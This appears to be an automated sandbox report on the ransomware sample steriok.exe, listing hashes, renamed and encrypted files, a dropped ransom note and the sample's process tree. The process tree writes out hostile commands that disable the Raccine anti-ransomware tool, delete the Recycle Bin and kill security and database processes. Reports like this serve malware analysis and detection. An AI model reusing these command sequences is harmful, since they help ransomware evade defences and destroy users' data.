eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46

Resubmissions

29-10-2021 09:03

211029-kz7xysdac7 10

28-10-2021 13:28

211028-qq5dcsgdeq 10

23-10-2021 01:52

211023-cagepshab4 8

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-en-20211014
submitted
28-10-2021 13:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

steriok.exe
Size

94KB
MD5

b0c615c0a4f485b2030d6e1ab98375f0
SHA1

de11e9d61e0a31dc19e8c5dd8fe06facf0ead052
SHA256

eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46
SHA512

82342be7d388244b5b008134d6d351f669995caff94a9a532ce056130f1af54a20ec6f2b9a3ca78102200c53a73659d1043e5b213ce84642d225690a3a848024

Score

8^/10

ransomware

Malware Config

Signatures

Modifies extensions of user files 14 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

steriok.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\DenyConnect.png => C:\Users\Admin\Pictures\DenyConnect.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\SuspendEnter.tif.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\WatchTrace.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\DenyConnect.png.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\ProtectMerge.tif => C:\Users\Admin\Pictures\ProtectMerge.tif.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\SuspendEnter.tif => C:\Users\Admin\Pictures\SuspendEnter.tif.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\OpenPing.raw => C:\Users\Admin\Pictures\OpenPing.raw.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\ProtectMerge.tif.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\WatchTrace.png => C:\Users\Admin\Pictures\WatchTrace.png.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\RegisterUpdate.crw => C:\Users\Admin\Pictures\RegisterUpdate.crw.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\RegisterUpdate.crw.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\OpenPing.raw.steriok	steriok.exe
File renamed	C:\Users\Admin\Pictures\RedoInstall.png => C:\Users\Admin\Pictures\RedoInstall.png.steriok	steriok.exe
File opened for modification	C:\Users\Admin\Pictures\RedoInstall.png.steriok	steriok.exe

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1216 cmd.exe
Drops startup file 1 IoCs

Processes:

steriok.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk steriok.exe

pid	process
1216	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	steriok.exe

Drops desktop.ini file(s) 6 IoCs

Processes:

steriok.exe

description	ioc	process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	steriok.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	steriok.exe

Drops file in Program Files directory 64 IoCs

Processes:

steriok.exe

description	ioc	process
File opened for modification	C:\Program Files\GetRestore.wma.steriok	steriok.exe
File opened for modification	C:\Program Files\GroupReset.dwfx	steriok.exe
File opened for modification	C:\Program Files\CloseWait.wps	steriok.exe
File opened for modification	C:\Program Files\EnterPublish.xht	steriok.exe
File opened for modification	C:\Program Files\SplitRestart.ogg.steriok	steriok.exe
File opened for modification	C:\Program Files\BlockWatch.asx.steriok	steriok.exe
File opened for modification	C:\Program Files\ConvertFromUnblock.M2V.steriok	steriok.exe
File opened for modification	C:\Program Files\PingPush.fon	steriok.exe
File opened for modification	C:\Program Files\ResetMount.easmx.steriok	steriok.exe
File opened for modification	C:\Program Files\SkipClear.mhtml.steriok	steriok.exe
File opened for modification	C:\Program Files\UnlockDebug.edrwx	steriok.exe
File opened for modification	C:\Program Files\CloseConvertTo.mp4	steriok.exe
File opened for modification	C:\Program Files\InstallUndo.jfif.steriok	steriok.exe
File opened for modification	C:\Program Files\InvokeConvert.edrwx.steriok	steriok.exe
File opened for modification	C:\Program Files\JoinInitialize.gif	steriok.exe
File opened for modification	C:\Program Files\RestoreProtect.001.steriok	steriok.exe
File opened for modification	C:\Program Files\ClearJoin.htm	steriok.exe
File opened for modification	C:\Program Files\GetRestore.wma	steriok.exe
File opened for modification	C:\Program Files\JoinInitialize.gif.steriok	steriok.exe
File opened for modification	C:\Program Files\SkipDisconnect.ps1	steriok.exe
File opened for modification	C:\Program Files\SubmitSet.potx.steriok	steriok.exe
File created	C:\Program Files\RESTORE_FILES_INFO.txt	steriok.exe
File opened for modification	C:\Program Files\CloseConvertTo.mp4.steriok	steriok.exe
File opened for modification	C:\Program Files\EditSplit.emz.steriok	steriok.exe
File opened for modification	C:\Program Files\NewWait.vsdm	steriok.exe
File opened for modification	C:\Program Files\RemoveEdit.mp4v	steriok.exe
File opened for modification	C:\Program Files\SearchDisconnect.otf	steriok.exe
File opened for modification	C:\Program Files\SkipClear.mhtml	steriok.exe
File opened for modification	C:\Program Files\UpdateFormat.wmf.steriok	steriok.exe
File opened for modification	C:\Program Files\ConvertRestore.eprtx.steriok	steriok.exe
File opened for modification	C:\Program Files\GroupSwitch.M2TS	steriok.exe
File opened for modification	C:\Program Files\ExitFind.vsdm	steriok.exe
File opened for modification	C:\Program Files\ClosePush.mp2	steriok.exe
File opened for modification	C:\Program Files\ClosePush.mp2.steriok	steriok.exe
File opened for modification	C:\Program Files\DisableGroup.potm	steriok.exe
File opened for modification	C:\Program Files\GroupReset.dwfx.steriok	steriok.exe
File opened for modification	C:\Program Files\SearchDisconnect.otf.steriok	steriok.exe
File opened for modification	C:\Program Files\SwitchConvert.reg.steriok	steriok.exe
File opened for modification	C:\Program Files\UnblockMeasure.clr	steriok.exe
File opened for modification	C:\Program Files\CheckpointSend.bmp.steriok	steriok.exe
File opened for modification	C:\Program Files\UnlockDebug.edrwx.steriok	steriok.exe
File opened for modification	C:\Program Files\UnblockMeasure.clr.steriok	steriok.exe
File opened for modification	C:\Program Files\EditSplit.emz	steriok.exe
File opened for modification	C:\Program Files\MergeUnlock.mht	steriok.exe
File opened for modification	C:\Program Files\MergeUnlock.mht.steriok	steriok.exe
File opened for modification	C:\Program Files\NewWait.vsdm.steriok	steriok.exe
File opened for modification	C:\Program Files\SplitRestart.ogg	steriok.exe
File opened for modification	C:\Program Files\SwitchConvert.reg	steriok.exe
File opened for modification	C:\Program Files\CheckpointApprove.mpg	steriok.exe
File opened for modification	C:\Program Files\ConvertMove.3gp	steriok.exe
File opened for modification	C:\Program Files\ConvertFromUnblock.M2V	steriok.exe
File opened for modification	C:\Program Files\CheckpointApprove.mpg.steriok	steriok.exe
File opened for modification	C:\Program Files\ClearJoin.htm.steriok	steriok.exe
File opened for modification	C:\Program Files\ExitFind.vsdm.steriok	steriok.exe
File opened for modification	C:\Program Files\RemoveTrace.ini	steriok.exe
File opened for modification	C:\Program Files\SubmitSet.potx	steriok.exe
File opened for modification	C:\Program Files\BlockWatch.asx	steriok.exe
File opened for modification	C:\Program Files\GroupSwitch.M2TS.steriok	steriok.exe
File opened for modification	C:\Program Files\PingPush.fon.steriok	steriok.exe
File opened for modification	C:\Program Files\RestoreProtect.001	steriok.exe
File opened for modification	C:\Program Files\ConfirmGroup.html.steriok	steriok.exe
File opened for modification	C:\Program Files\CloseWait.wps.steriok	steriok.exe
File opened for modification	C:\Program Files\ConvertRestore.eprtx	steriok.exe
File opened for modification	C:\Program Files\EnterPublish.xht.steriok	steriok.exe

Drops file in Windows directory 28 IoCs

Processes:

steriok.exe

description	ioc	process
File opened for modification	C:\Windows\bootstat.dat	steriok.exe
File opened for modification	C:\Windows\setupact.log	steriok.exe
File opened for modification	C:\Windows\setuperr.log	steriok.exe
File opened for modification	C:\Windows\TSSysprep.log	steriok.exe
File opened for modification	C:\Windows\WindowsShell.Manifest	steriok.exe
File opened for modification	C:\Windows\WindowsUpdate.log	steriok.exe
File opened for modification	C:\Windows\WindowsUpdate.log.steriok	steriok.exe
File opened for modification	C:\Windows\DtcInstall.log	steriok.exe
File opened for modification	C:\Windows\mib.bin	steriok.exe
File opened for modification	C:\Windows\msdfmap.ini.steriok	steriok.exe
File opened for modification	C:\Windows\WindowsShell.Manifest.steriok	steriok.exe
File opened for modification	C:\Windows\WMSysPr9.prx	steriok.exe
File opened for modification	C:\Windows\setupact.log.steriok	steriok.exe
File opened for modification	C:\Windows\Ultimate.xml.steriok	steriok.exe
File opened for modification	C:\Windows\msdfmap.ini	steriok.exe
File opened for modification	C:\Windows\PFRO.log	steriok.exe
File opened for modification	C:\Windows\system.ini	steriok.exe
File opened for modification	C:\Windows\win.ini.steriok	steriok.exe
File created	C:\Windows\bootstat.dat.steriok	steriok.exe
File opened for modification	C:\Windows\DtcInstall.log.steriok	steriok.exe
File opened for modification	C:\Windows\Starter.xml	steriok.exe
File opened for modification	C:\Windows\Starter.xml.steriok	steriok.exe
File opened for modification	C:\Windows\system.ini.steriok	steriok.exe
File opened for modification	C:\Windows\TSSysprep.log.steriok	steriok.exe
File created	C:\Windows\RESTORE_FILES_INFO.txt	steriok.exe
File opened for modification	C:\Windows\PFRO.log.steriok	steriok.exe
File opened for modification	C:\Windows\Ultimate.xml	steriok.exe
File opened for modification	C:\Windows\win.ini	steriok.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1044	taskkill.exe
1164	taskkill.exe
1516	taskkill.exe
916	taskkill.exe
1528	taskkill.exe
1176	taskkill.exe
432	taskkill.exe
1252	taskkill.exe
828	taskkill.exe
1032	taskkill.exe
944	taskkill.exe
1956	taskkill.exe
1696	taskkill.exe
1180	taskkill.exe
1648	taskkill.exe
1108	taskkill.exe
1460	taskkill.exe
1648	taskkill.exe
1508	taskkill.exe
1464	taskkill.exe
668	taskkill.exe
1612	taskkill.exe
1540	taskkill.exe
1252	taskkill.exe
1112	taskkill.exe
540	taskkill.exe
1216	taskkill.exe
1596	taskkill.exe
1052	taskkill.exe
1820	taskkill.exe
1196	taskkill.exe
1044	taskkill.exe
1592	taskkill.exe
1716	taskkill.exe
1716	taskkill.exe
1712	taskkill.exe
944	taskkill.exe
1832	taskkill.exe
840	taskkill.exe
1196	taskkill.exe
1064	taskkill.exe
1380	taskkill.exe
1988	taskkill.exe
1640	taskkill.exe
1460	taskkill.exe
1588	taskkill.exe
432	taskkill.exe
940	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1080 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1948 notepad.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1096 PING.EXE

pid	process
1080	reg.exe

pid	process
1948	notepad.exe

pid	process
1096	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

steriok.exe

pid	process
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe
2024	steriok.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

steriok.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2024	steriok.exe
Token: SeDebugPrivilege	432	taskkill.exe
Token: SeDebugPrivilege	1596	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	1064	taskkill.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	668	taskkill.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeDebugPrivilege	1460	taskkill.exe
Token: SeDebugPrivilege	1380	taskkill.exe
Token: SeDebugPrivilege	1988	taskkill.exe
Token: SeDebugPrivilege	1612	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1164	taskkill.exe
Token: SeDebugPrivilege	1516	taskkill.exe
Token: SeDebugPrivilege	1196	taskkill.exe
Token: SeDebugPrivilege	916	taskkill.exe
Token: SeDebugPrivilege	1180	taskkill.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	1252	taskkill.exe
Token: SeDebugPrivilege	1112	taskkill.exe
Token: SeDebugPrivilege	1832	taskkill.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeDebugPrivilege	1044	taskkill.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeDebugPrivilege	1640	taskkill.exe
Token: SeDebugPrivilege	1460	taskkill.exe
Token: SeDebugPrivilege	944	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	540	taskkill.exe
Token: SeDebugPrivilege	1216	taskkill.exe
Token: SeDebugPrivilege	432	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	940	taskkill.exe
Token: SeDebugPrivilege	968	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

steriok.exe

pid process

2024 steriok.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

steriok.exe

pid process

2024 steriok.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

steriok.exe

description	pid	process	target process
PID 2024 wrote to memory of 432	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 432	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 432	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 432	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 832	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 832	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 832	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 832	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 1080	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 1080	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 1080	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 1080	2024	steriok.exe	reg.exe
PID 2024 wrote to memory of 1692	2024	steriok.exe	schtasks.exe
PID 2024 wrote to memory of 1692	2024	steriok.exe	schtasks.exe
PID 2024 wrote to memory of 1692	2024	steriok.exe	schtasks.exe
PID 2024 wrote to memory of 1692	2024	steriok.exe	schtasks.exe
PID 2024 wrote to memory of 1608	2024	steriok.exe	cmd.exe
PID 2024 wrote to memory of 1608	2024	steriok.exe	cmd.exe
PID 2024 wrote to memory of 1608	2024	steriok.exe	cmd.exe
PID 2024 wrote to memory of 1608	2024	steriok.exe	cmd.exe
PID 2024 wrote to memory of 1948	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1948	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1948	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1948	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1988	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1988	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1988	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1988	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1720	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1720	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1720	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1720	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1436	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1436	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1436	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1436	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 616	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 616	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 616	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 616	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1936	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1936	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1936	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1936	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1668	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1668	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1668	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1668	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 944	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 944	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 944	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 944	2024	steriok.exe	sc.exe
PID 2024 wrote to memory of 1196	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1196	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1196	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1196	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1596	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1596	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1596	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1596	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1044	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1044	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1044	2024	steriok.exe	taskkill.exe
PID 2024 wrote to memory of 1044	2024	steriok.exe	taskkill.exe

C:\Users\Admin\AppData\Local\Temp\steriok.exe
"C:\Users\Admin\AppData\Local\Temp\steriok.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2024
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:432
- C:\Windows\SysWOW64\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:832
- C:\Windows\SysWOW64\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1080
- C:\Windows\SysWOW64\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1692
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1608
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:1948
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1720
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:1988
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1436
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:616
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1936
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:1668
- C:\Windows\SysWOW64\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:944
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM synctime.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1596
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1064
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1464
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqbcoreservice.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:668
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM isqlplussvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1052
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM firefoxconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM encsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1696
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM onenote.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:828
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tbirdconfig.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1460
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM excel.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1612
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM agntsvc.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1380
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM PccNTMon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1988
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbeng50.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:944
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM CNTAoSMgr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1820
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM thebat64.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msaccess.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1164
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlwriter.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM steam.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ocomm.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:916
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" IM thunderbird.exe /F
  2⤵
  - Kills process with taskkill
  PID:1032
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM outlook.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1180
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM infopath.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM tmlisten.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1252
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM dbsnmp.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM wordpad.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1648
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM msftesql.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1832
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM xfssvccon.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mbamtray.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
